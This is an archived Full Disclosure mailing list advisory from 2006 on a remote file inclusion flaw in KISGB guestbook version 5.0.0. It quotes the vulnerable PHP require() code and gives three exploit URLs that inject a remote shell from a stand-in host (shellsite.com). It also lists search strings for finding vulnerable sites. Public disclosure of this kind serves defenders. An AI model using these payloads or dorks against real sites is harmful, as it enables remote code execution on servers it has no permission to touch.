Full Disclosure mailing list archives
Multiple Remote Vulnerabilities in KISGB
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan () gmail com>
Date: Fri, 22 Dec 2006 21:55:17 +0100
########################################################################### # Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB # # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: zeus () diosdelared com # Website: www.diosdelared.com # Date: 22/12/06 # Risk: critical # Vendor Url: http://sourceforge.net/projects/kisgb, http://ravenphpscripts.com # Affected Software: Keep It Simple Guest Book # search: inurl:kisgb , intitle:KISGB # #Info: ################################################################## #Bug is risky by since it is possible to be included I cosay malisioso #that allows to see or to modify the archives #code: #if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme"); #else require("$path_to_themes/$theme"); ################################################################## # # #http://site/path/gbpath/authenticate.php?path_to_themes= http://shellsite.com/php.gif? # #http://site/path/gbpath/admin.php?default_path_for_themes= http://shellsite.com/php.gif? # #http://site/path/gbpath/upconfig.php?default_path_for_themes= http://shellsite.com/php.gif? ################################################################## #VULNERABLE VERSIONS ################################################################## # 5.0.0 # ################################################################## #Contact information #0o_zeus_o0 #zeus () diosdelared com #www.diosdelared.com ################################################################## #greetz: S.S.M, sams, a mi beba #Original Advisory: http://diosdelared.com/15.txt ##################################################################
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Multiple Remote Vulnerabilities in KISGB 0o_zeus_o0 elitemexico.org (Dec 23)
- Re: Multiple Remote Vulnerabilities in KISGB 3APA3A (Dec 22)
- Re: Multiple Remote Vulnerabilities in KISGB str0ke (Dec 22)
